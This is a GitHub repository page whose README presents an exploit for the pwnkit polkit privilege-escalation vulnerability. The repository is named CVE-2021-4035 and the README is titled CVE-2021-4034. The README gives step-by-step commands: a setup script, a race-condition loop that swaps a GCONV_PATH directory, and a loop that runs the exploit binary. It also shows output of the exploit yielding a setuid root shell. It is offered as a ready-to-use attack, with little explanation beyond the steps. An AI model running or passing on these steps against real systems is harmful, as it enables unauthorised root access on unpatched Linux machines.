Skip to content

T3n4ci0us/CVE-2021-4035

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-4034

Exploit for the pwnkit vulnerability from the Qualys team.

This exploit assumes that gcc is present on the target machine.

$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh

Run the following command in one bash session:

while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done

Run the following command in another bash session:

while :; do ./exploit; done

You will eventually win the race and obtain a shell binary that gives you root access:

$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)

A short write up on the technique can be found on my blog.

Releases

No releases published

Packages

No packages published

Languages

  • C 76.2%
  • Shell 23.8%